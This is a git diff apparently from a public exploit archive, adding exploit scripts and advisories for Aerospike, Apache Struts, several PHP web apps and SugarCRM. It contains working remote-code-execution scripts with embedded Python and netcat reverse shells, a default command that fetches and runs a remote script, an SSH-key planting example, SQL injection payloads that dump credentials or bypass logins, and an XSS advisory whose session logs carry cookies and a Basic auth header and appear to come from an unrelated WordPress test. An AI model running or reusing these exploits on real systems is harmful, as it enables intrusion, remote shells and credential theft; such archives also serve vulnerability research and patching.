diff --git a/exploits/multiple/remote/49067.py b/exploits/multiple/remote/49067.py
new file mode 100755
index 000000000..5ec8e8780
--- /dev/null
+++ b/exploits/multiple/remote/49067.py
@@ -0,0 +1,175 @@
+# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
+# Date: 2020-08-01
+# Exploit Author: Matt S
+# Vendor Homepage: https://www.aerospike.com/
+# Version: < 5.1.0.3
+# Tested on: Ubuntu 18.04
+# CVE : CVE-2020-13151
+
+#!/usr/bin/env python3
+import argparse
+import random
+import os, sys
+from time import sleep
+import string
+
+# requires aerospike package from pip
+import aerospike
+# if this isn't installing, make sure os dependencies are met
+# sudo apt-get install python-dev
+# sudo apt-get install libssl-dev
+# sudo apt-get install python-pip
+# sudo apt-get install zlib1g-dev
+
+PYTHONSHELL = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&"""
+NETCATSHELL = 'rm /tmp/ft;mkfifo /tmp/ft;cat /tmp/ft|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/ft&'
+
+def _get_client(cfg):
+ try:
+ return aerospike.client({
+ 'hosts': [(cfg.ahost, cfg.aport)],
+ 'policies': {'timeout': 8000}}).connect()
+
+ except Exception as e:
+ print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}")
+
+def _send(client, cfg, _cmd):
+ try:
+ print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring ), 'poc', 'runCMD', [_cmd]))
+ except Exception as e:
+ print(f"[-] UDF execution returned {e.msg}")
+
+def _register_udf(client, cfg):
+ try:
+ client.udf_put(cfg.udfpath)
+ except Exception as e:
+ print(f"[-] whoops, couldn't register the udf {cfg.udfpath}")
+ raise e
+
+def _random_string(l):
+ return ''.join([random.choice(string.ascii_lowercase + string.ascii_uppercase) for i in range(l)])
+
+def _populate_table(client, cfg):
+ ns = cfg.namespace
+ setname = cfg.setname
+ print(f"[+] writing to {ns}.{setname}")
+ try:
+ rec = cfg.dummystring
+ client.put((ns, setname, rec), {'pk':cfg.dummystring})
+ print(f"[+] wrote {rec}")
+ except Exception as e:
+ print(f"[-] unable to write record: {e.msg}")
+ try:
+ if e.msg.startswith('Invalid namespace'):
+ print("Valid namespaces: ")
+ for n in _info_parse("namespaces", client).split(";"):
+ print(n.strip())
+ except:
+ pass
+ sys.exit(13)
+
+def _info_parse(k, client):
+ try:
+ return [i[1] for i in client.info_all(k).values() ][0]
+ except Exception as e:
+ print(f"error retrieving information: {e.msg}")
+ return []
+
+def _is_vuln(_mj, _mi, _pt, _bd):
+ fixed = [5,1,0,0]
+ found = [_mj, _mi, _pt, _bd]
+
+ if fixed == found:
+ return False
+
+ for ix, val in enumerate(found):
+ if val < fixed[ix]:
+ return True
+ elif val == fixed[ix]:
+ pass
+ else:
+ return False
+
+
+def _version_check(client):
+ print("[+] aerospike build info: ", end="")
+ try:
+ _ver = _info_parse("build", client)
+ print(_ver)
+ mj, mi, pt, bd = [int(i) for i in _ver.split('.')]
+ if _is_vuln(mj, mi, pt, bd):
+ print("[+] looks vulnerable")
+ return
+ else:
+ print(f"[-] this instance is patched.")
+ sys.exit(0)
+
+ except Exception as e:
+ print(f"[+] unable to interpret build number due to {e}")
+ print("[+] continuing anyway... ")
+
+def _exploit(cfg):
+ client = _get_client(cfg)
+
+ if not client:
+ return
+
+ _version_check(client)
+
+ print(f"[+] populating dummy table.")
+ _populate_table(client, cfg)
+
+ print(f"[+] registering udf")
+
+ _register_udf(client, cfg)
+
+ if cfg.pythonshell or cfg.netcatshell:
+ sys.stdout.flush()
+ print(f"[+] sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="")
+ sys.stdout.flush()
+ for i in range(4):
+ print(".", end="")
+ sys.stdout.flush()
+ sleep(1)
+
+ print(".")
+ _send(client, cfg, PYTHONSHELL.format(ip=cfg.lhost,port=cfg.lport) if cfg.pythonshell else NETCATSHELL.format(ip=cfg.lhost,port=cfg.lport) )
+
+ if cfg.cmd:
+ print(f"[+] issuing command \"{cfg.cmd}\"")
+ _send(client, cfg, cfg.cmd)
+
+if __name__ == '__main__':
+ if len(sys.argv) == 1:
+ print(f"[+] usage examples:\n{sys.argv[0]} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000")
+ print("... or ... ")
+ print(f"{sys.argv[0]} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'")
+ sys.exit(0)
+
+ parser = argparse.ArgumentParser(description='Aerospike UDF Command Execution - CVE-2020-13151 - POC')
+
+ parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1")
+ parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int)
+ parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test")
+ parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None)
+ parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None)
+ parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true")
+ parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true")
+ parser.add_argument("--lhost", help="host to use for reverse shell callback")
+ parser.add_argument("--lport", help="port to use for reverse shell callback")
+ parser.add_argument("--cmd", help="custom command to issue against the underlying host")
+ parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None)
+
+ cfg = parser.parse_args()
+ if not cfg.setname:
+ cfg.setname = 'cve202013151'
+ if not cfg.dummystring:
+ cfg.dummystring = _random_string(16)
+ if not cfg.udfpath:
+ cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua')
+
+ assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), "Must specify a command, or a reverse shell + lhost + lport"
+ if cfg.pythonshell or cfg.netcatshell:
+ assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell"
+
+ _exploit(cfg)
\ No newline at end of file
diff --git a/exploits/multiple/remote/49068.py b/exploits/multiple/remote/49068.py
new file mode 100755
index 000000000..1551ebacf
--- /dev/null
+++ b/exploits/multiple/remote/49068.py
@@ -0,0 +1,163 @@
+# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation
+# Date: 08/18/2020
+# Exploit Author: West Shepherd
+# Vendor Homepage: https://struts.apache.org/download.cgi
+# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)
+# CVE : CVE-2019-0230
+# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.
+# Source(s):
+# https://github.com/PrinceFPF/CVE-2019-0230
+# https://cwiki.apache.org/confluence/display/WW/S2-059
+# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22
+
+# !/usr/bin/python
+from sys import argv, exit, stdout, stderr
+import argparse
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import logging
+
+
+class Exploit:
+ def __init__(
+ self,
+ target='',
+ redirect=False,
+ proxy_address=''
+ ):
+ requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+ self.target = target
+ self.session = requests.session()
+ self.redirect = redirect
+ self.timeout = 0.5
+ self.proxies = {
+ 'http': 'http://%s' % proxy_address,
+ 'https': 'http://%s' % proxy_address
+ } \
+ if proxy_address is not None \
+ and proxy_address != '' else {}
+ self.query_params = {}
+ self.form_values = {}
+ self.cookies = {}
+ boundary = "---------------------------735323031399963166993862150"
+ self.headers = {
+ 'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
+ 'Accept': '*/*',
+ 'Connection': 'close'
+ }
+ payload = "%{(#nike='multipart/form-data')." \
+ "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
+ "(#_memberAccess?(#_memberAccess=#dm):" \
+
+"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+\
+
+"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+\
+ "(#ognlUtil.getExcludedPackageNames().clear())." \
+ "(#ognlUtil.getExcludedClasses().clear())." \
+ "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \
+
+"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
+\
+
+"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
+ "(#p=new
+java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \
+
+"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()."
+\
+
+"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
+\
+ "(#ros.flush())}"
+
+ self.payload = "--%s\r\nContent-Disposition: form-data;
+name=\"foo\"; " \
+ "filename=\"%s\0b\"\r\nContent-Type:
+text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % (
+ boundary, payload, boundary
+ )
+
+ def do_get(self, url, params=None, data=None):
+ return self.session.get(
+ url=url,
+ verify=False,
+ allow_redirects=self.redirect,
+ headers=self.headers,
+ cookies=self.cookies,
+ proxies=self.proxies,
+ data=data,
+ params=params
+ )
+
+ def do_post(self, url, data=None, params=None):
+ return self.session.post(
+ url=url,
+ data=data,
+ verify=False,
+ allow_redirects=self.redirect,
+ headers=self.headers,
+ cookies=self.cookies,
+ proxies=self.proxies,
+ params=params
+ )
+
+ def debug(self):
+ try:
+ import http.client as http_client
+ except ImportError:
+ import httplib as http_client
+ http_client.HTTPConnection.debuglevel = 1
+ logging.basicConfig()
+ logging.getLogger().setLevel(logging.DEBUG)
+ requests_log = logging.getLogger("requests.packages.urllib3")
+ requests_log.setLevel(logging.DEBUG)
+ requests_log.propagate = True
+ return self
+
+ def send_payload(self, command='curl --insecure -sv
+https://10.10.10.10/shell.py|python -'):
+ url = self.target
+ stdout.write('sending payload to %s payload %s' % (url, command))
+ resp = self.do_post(url=url, params=self.query_params,
+data=self.payload.replace('{COMMAND}', command))
+ return resp
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(add_help=True,
+ description='CVE-2020-0230 Struts
+2 exploit')
+ try:
+ parser.add_argument('-target', action='store', help='Target
+address: http(s)://target.com/index.action')
+ parser.add_argument('-command', action='store',
+ help='Command to execute: touch /tmp/pwn')
+ parser.add_argument('-debug', action='store', default=False,
+help='Enable debugging: False')
+ parser.add_argument('-proxy', action='store', default='',
+help='Enable proxy: 10.10.10.10:8080')
+
+ if len(argv) == 1:
+ parser.print_help()
+ exit(1)
+ options = parser.parse_args()
+
+ exp = Exploit(
+ proxy_address=options.proxy,
+ target=options.target
+ )
+
+ if options.debug:
+ exp.debug()
+ stdout.write('target %s debug %s proxy %s\n' % (
+ options.target, options.debug, options.proxy
+ ))
+
+ result = exp.send_payload(command=options.command)
+ stdout.write('Response: %d\n' % result.status_code)
+
+ except Exception as error:
+
+stderr.write('error in main %s' % str(error))
\ No newline at end of file
diff --git a/exploits/php/webapps/49048.txt b/exploits/php/webapps/49048.txt
index 22b8874b7..f3a3d8330 100644
--- a/exploits/php/webapps/49048.txt
+++ b/exploits/php/webapps/49048.txt
@@ -34,4 +34,32 @@ $result = mysqli_query($conn,"SELECT * FROM user WHERE id = '$user_id'");
..
..
+-------------------------------
+
+Vulnerable param: id
+-------------------------------------------------------------------------
+GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 163
+Origin: http://localhost
+Connection: close
+Cookie: COOKIE
+Upgrade-Insecure-Requests: 1
+-------------------------------------------------------------------------
+
+Source Code: \WBS\viewbill.php
+
+..
+..
+..
+$id =$_REQUEST['id'];
+$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'");
+..
+..
+
-------------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/49051.txt b/exploits/php/webapps/49051.txt
deleted file mode 100644
index b7a8f4fab..000000000
--- a/exploits/php/webapps/49051.txt
+++ /dev/null
@@ -1,38 +0,0 @@
-# Exploit Title: Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)
-# Date: 2020-11-14
-# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
-# Author ID: 8763
-# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
-# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
-# Version: 1.0
-# Tested on: Apache2 and Windows 10
-
-Vulnerable param: id
--------------------------------------------------------------------------
-GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1
-Host: localhost
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
-Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
-Accept-Encoding: gzip, deflate
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 163
-Origin: http://localhost
-Connection: close
-Cookie: COOKIE
-Upgrade-Insecure-Requests: 1
-
-
--------------------------------------------------------------------------
-
-Source Code: \WBS\viewbill.php
-
-..
-..
-..
-$id =$_REQUEST['id'];
-$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'");
-..
-..
-
--------------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/49056.txt b/exploits/php/webapps/49056.txt
index e8f3d6e3f..6611f0b70 100644
--- a/exploits/php/webapps/49056.txt
+++ b/exploits/php/webapps/49056.txt
@@ -29,4 +29,27 @@ booking.php:
$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['car_id']);
foreach($qry->fetch_array() as $k => $val){
$$k=$val;
-}
\ No newline at end of file
+}
+
+Vulnerable param: id
+-------------------------------------------------------------------------
+GET /car_rental/index.php?page=view_car&id=-3+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+users# HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+
+Source Code:
+
+view_car.php:
+--------------------------------------------------------------------
+query("SELECT * FROM cars where id= ".$_GET['id']);
\ No newline at end of file
diff --git a/exploits/php/webapps/49058.txt b/exploits/php/webapps/49058.txt
new file mode 100644
index 000000000..913e708f0
--- /dev/null
+++ b/exploits/php/webapps/49058.txt
@@ -0,0 +1,43 @@
+# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass
+# Date: 17-11-2020
+# Exploit Author: Kislay Kumar
+# Vendor Homepage: http://egavilanmedia.com
+# Software Link : http://egavilanmedia.com/user-registration-and-login-system-with-admin-pane=l/
+# Version: N/A (Default)
+# Tested on: Kali Linux
+
+SQL Injection:
+SQL injection is a web security vulnerability that allows an attacker
+to alter the SQL queries made to the database. This can be used to
+retrieve some sensitive information, like database structure, tables,
+columns, and their underlying data.
+
+Attack Vector:
+An attacker can gain admin panel access using malicious sql injection queri=
+es.
+
+Steps to reproduce:
+1. Open admin login page using following URl:
+-> http://localhost/admin/login.html
+
+2. Now put below Payload in both the fields( User ID & Password)
+Payload: admin' or '1'='1
+
+3. Server accepted our payload and we bypassed admin panel without any
+credentials,
+
+IMPACT:
+if any attacker can gain admin panel access than they can Update &
+Delete Userdata
+
+Suggested Mitigation/Remediation Actions
+Parameterized queries should be used to separate the command and data
+portions of the intended query to the database. These queries prevent
+an attacker from tampering with the query logic and extending a
+concatenated database query string. Code reviews should be conducted
+to identify any additional areas were the application or other
+applications in the organization are vulnerable to this attack.
+Additionally, input validation should be enforced on the server side
+in order to ensure that only expected data is sent in queries. Where
+possible security specific libraries should be used in order to
+provide an additional layer of protection.
\ No newline at end of file
diff --git a/exploits/php/webapps/49059.txt b/exploits/php/webapps/49059.txt
new file mode 100644
index 000000000..fd53a530a
--- /dev/null
+++ b/exploits/php/webapps/49059.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection
+# Google Dork: N/A
+# Date: 11/16/2020
+# Exploit Author: Ramil Mustafayev
+# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-doctor-appointment-booking-system-php-and-mysql/
+# Software Link: https://projectworlds.in/wp-content/uploads/2020/05/PHP-Doctor-Appointment-System.zip
+# Version: 1.0
+# Tested on: Win10 x64, Kali Linux x64
+# CVE : N/A
+######## Description ########
+#
+# An SQL injection vulnerability was discovered in PHP-Doctor-Appointment-System.
+#
+# In getuser.php file, GET parameter 'q' is vulnerable.
+#
+# The vulnerability could allow for the improper neutralization of special elements in SQL commands and may lead to the product being vulnerable to SQL injection.
+#
+#############################
+
+Vulnerable code:
+
+include_once 'assets/conn/dbconnect.php';
+$q = $_GET['q']; // Vulnerable param
+// echo $q;
+$res = mysqli_query($con,"SELECT * FROM doctorschedule WHERE scheduleDate='$q'"); // Injection point
+
+Used Payload:
+
+http://localhost/[PATH]/getuser.php?q=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7162717671%2CIFNULL%28CAST%28schema_name%20AS%20NCHAR%29%2C0x20%29%2C0x7176627871%29%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA%23
+
+Output:
+
+Extracted database: qbqvqdb_healthcareqvbxq
\ No newline at end of file
diff --git a/exploits/php/webapps/49060.txt b/exploits/php/webapps/49060.txt
new file mode 100644
index 000000000..dae5af311
--- /dev/null
+++ b/exploits/php/webapps/49060.txt
@@ -0,0 +1,366 @@
+# Exploit Title: SugarCRM 6.5.18 - Persistent Cross-Site Scripting
+# Exploit Author: Vulnerability-Lab
+# Date: 2020-11-16
+# Vendor Homepage: https://www.sugarcrm.com
+# Version: 6.5.18
+
+Document Title:
+===============
+SugarCRM v6.5.18 - (Contacts) Persistent Cross Site Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2249
+
+
+Release Date:
+=============
+2020-11-16
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2249
+
+
+Common Vulnerability Scoring System:
+====================================
+5.1
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+2.000€ - 3.000€
+
+
+Product & Service Introduction:
+===============================
+SugarCRM empowers your marketing, sales and services teams to
+collaborate across the entire customer lifecycle for more
+meaningful, memorable experiences. More than 2 million users in 120
+countries have switched to SugarCRM to fuel extraordinary
+customer experiences. We have disrupted the market with a relentless
+pursuit of innovation and visionary solutions,
+bringing the world’s first no-touch, time-aware CX platform. The CX
+suite aggregates the millions of different data points
+on your customers and turns them into proactive truths, trends and
+predictions for you to leverage.
+
+(Copy of the Homepage: https://www.sugarcrm.com )
+
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent
+cross site scripting web vulnerability in the official SugarCRM v6.5.18
+web-application.
+
+
+Affected Product(s):
+====================
+SugarCRM
+Product: SugarCRM v6.5.18 - CRM (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-03: Researcher Notification & Coordination (Security Researcher)
+2020-05-04: Vendor Notification (Security Department)
+2020-05-24: Vendor Notification (Security Department)
+****-**-**: Vendor Response/Feedback (Security Department)
+****-**-**: Vendor Fix/Patch (Service Developer Team)
+****-**-**: Security Acknowledgements (Security Department)
+2020-11-16: Public Disclosure (Vulnerability Laboratory)
+
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Guest Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in
+the official SugarCRM v6.5.18 web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to
+compromise browser to web-application requests from the application-side.
+
+The persistent cross site web vulnerability is located in the primary
+address state and alternate address state
+input fields of the sales or support module open to create a contacts.
+Remote attackers with low privileged
+sugarcrm accounts are able to inject own malicious script code as
+contact. Higher privileged application user
+accounts will execute the script code on preview of the created contact
+to e.g gain moderator or administrator
+rights via session hijacking, phishing or further persistent
+manipulative web attacks. The code does not only
+execute in the same section were the contact is listed or previewed but
+also after save in the view log function
+context. The attack can thus way be performed via create of a contact or
+via import of a vcf file contact.
+The request method to inject is POST and the attack is limited to
+registered user accounts with default
+contact to the contacts module.
+
+The script code is able to bypass the basic validation process because
+of the primary address state and alternate
+address state are exchanged in the transmit request. Normally in a
+regular transmit the context is parsed securely.
+In the actual case an attacker injects script code in the alternate
+adress when changing the main adress the wrong
+sanitized code occurs in the front-end.
+
+Successful exploitation of the vulnerability results in session
+hijacking, persistent phishing attacks, persistent
+external redirects to malicious source and persistent manipulation of
+affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Sales
+[+] Support
+
+Vulnerable Input(s):
+[+] Primary Address State
+[+] Alternate Address State
+
+Vulnerable Parameter(s):
+[+] primary address state
+[+] alternate address state
+
+Affected Module(s):
+[+] Sales - Contact List
+[+] Support - Contact List
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerability can be exploited by
+remote attackers with low privileged user account and with low user
+interaction.
+For security demonstration or to reproduce the persistent cross site web
+vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the sugarcrm application
+2. Login as low privileged user account
+3. Move to sales or support and click to contact, then open create a new
+contact
+4. Inject payload in the other address and primary adress to the
+alternate address state and primary state input fields
+5. Save the entry and a refresh occurs with the inserted contact details
+Note: The script code execute immediatly after saving in the primary
+adress state and alternate adress state section of both modules
+6. Successful reproduce of the persistent cross site scripting web
+vulnerability!
+
+
+PoC: Payload
+>
+
+
+
+
+
+
+
+
+--- PoC Session Logs (POST) ---
+https://test23.localhost:8000/index.php?rest_route=%2Fwp%2Fv2%2Fpages%2F6&_locale=user
+Host: test23.localhost:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0)
+Gecko/20100101 Firefox/76.0
+Accept: application/json, */*;q=0.1
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit
+X-WP-Nonce: 04a953e188
+X-HTTP-Method-Override: PUT
+Content-Type: application/json
+Origin: https://test23.localhost:8000
+Content-Length: 614
+Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
+Connection: keep-alive
+Cookie:
+g3sid=bdbf56f2335bbce0720f03ed25343b66db61b54a%7E6a5nrndvh14i5kb09tfrl7afe2;
+wordpress_test_cookie=WP+Cookie+check;
+wordpress_logged_in_55a3fb1cb724d159a111224c7f110400=admin_f507c7w4%7C1589912472%7CxTSn77nlwpdxYR8NUaJOXfQM9ShaBlSLzP7Anix
+xNt8%7C557ca2874863d9f1f6a8316659798e11558a01ffc8671eea68d496aa5df99b17;
+wp-settings-time-1=1589740723
+{"id":6,"content":"nnnnn